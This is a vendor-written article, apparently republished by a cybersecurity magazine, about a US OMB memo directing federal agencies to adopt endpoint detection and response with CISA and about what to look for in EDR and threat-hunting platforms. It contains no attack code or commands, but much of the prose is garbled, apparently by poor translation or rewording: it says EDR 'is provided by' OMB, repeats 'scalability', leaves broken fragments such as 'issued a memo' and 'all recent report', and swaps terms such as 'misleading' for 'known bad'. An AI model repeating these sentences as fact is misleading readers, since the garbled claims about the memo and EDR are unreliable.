By Matt Marsden, Vice President, Technical Account Management, Federal, Tanium
Endpoint detection and response (EDR) is provided by the Office of Management and Budget (OMB). issued a memo Institutions are expected to collaborate during the development and deployment of EDR solutions.
The OMB memo is implemented by the Cybersecurity and Infrastructure Security Agency (CISA) to create government-level visibility through a centrally located EDR initiative and support host-level visibility, attribution, and response across federal information systems.
Within 90 days of publication of the memo, institutions must provide CISA with access to current and future EDR tools, and CISA must provide recommendations to accelerate EDR adoption. Within 120 days, institutions must analyze their EDR solutions with CISA and identify gaps.
all recent report Since the shift to telecommuting, 79% of IT teams report an increase in breaches at endpoints. EDR solutions are desperately needed within the federal government, especially in the era of remote work. “The ability to detect and respond to increasingly sophisticated threat activity on federal networks.”
What is EDR?
EDR is the ability to identify and respond to cyber threats by combining real-time continuous monitoring of data and endpoint collection with rules-based automated response and analysis capabilities. EDR tools have gained considerable popularity among IT security operations teams due to their ease of use and understanding that endpoints can provide the richest data about intruders.
EDR enables you to:
- Categorize and investigate these alerts with simple, automated pattern detection of known malicious attack types.
- Automated response in that you can configure predetermined actions in detection rules
- Centralize endpoint logs and telemetry data in the cloud for offline analysis
EDR techniques are useful, but only look for certain types of activity, or “misleading” activities. Most EDR tools limit the activity they log to reduce bandwidth and storage. So what happens when the network experiences “unknown bad”? This vulnerability gap creates many blind spots for attackers to enter, but other solutions can reduce these issues.
What should institutions look for in a solution?
Experienced attackers know the EDR feature and know how to circumvent it. When organizations combine threat-hunting solutions with EDR technologies, they gain deeper, more comprehensive visibility into their endpoints.
When looking for a suitable threat hunting platform, it is important for agencies to keep certain criteria in mind, such as adaptability, scalability, and scalability. It is also important to have a platform that is fully powered by accurate data and can respond to threats in seconds. Here are some factors to look for when choosing an EDR solution:
- Continuous monitoring of endpoints. Legacy security solutions tend to use incompatible sets of point solutions linked together in SIEM, resulting in datasets that do not contain unmanaged offline or out-of-network endpoints weeks ago. Instead, it is important for organizations to have a comprehensive platform to collect in-depth endpoint data by providing the ability to collect accurate, real-time data in minutes instead of months.
- Formatted and organized data. Many tools require you to export data from different sources, normalize the output, and then combine all of this into one report. It is important for institutions to streamline this process with solutions that provide actionable data that is already in a format suitable for use.
- Zero trust architecture. Achieving strong endpoint defenses requires full visibility into the entire operating environment. Institutions need to find a platform with a zero-trust architecture that continuously monitors the health of devices and verifies that they are patched, secure, compliant, and managed.
Endpoint security and management platform solutions can dig deeper into suspicious activity detected by EDR to understand threats and protect additional systems that may have been compromised. A single platform of this nature can collect in-depth endpoint data, giving organizations the ability to collect accurate, real-time data in minutes.
The time to improve cyber is now, and everyone is part of the process. The federal government has set a precedent with this memo, and the agency understands the importance of the guidance. Institutions need to implement robust EDR solutions and enhance their EDR capabilities to improve their security posture and responsiveness.
About the author
Matt Marsden is Tanium’s Vice President of Federal Technical Account Management. He is a cyber expert with over 24 years of experience working in the federal government. Matt began federal service in the US Navy supporting surface submarine operations, transitioning to civil service, supporting DoD and Intelligence Communities before joining Tanium. Matt can be contacted online at: LinkedIn and on our website https://www.tanium.com/solutions/federal-government/
Fair Use Notice: “Fair use” laws allow other authors to make limited use of the original author’s work without permission. Under 17 US Code § 107, “It is not copyright infringement to use copyrighted material for purposes such as criticism, commentary, news reporting, education (including multiple copies for classroom use), scholarship, or research.” As a matter of policy, fair use is based on the belief that the public is free to use portions of copyrighted material for the purposes of comment and criticism. Fair use privileges are perhaps the most important restrictions on the exclusive rights of copyright owners. Cyber Defense Media Group is a news reporting company that reports cyber news, events, information and more free of charge on its website Cyber Defense Magazine. All images and reporting are conducted exclusively in accordance with the fair use of US copyright laws.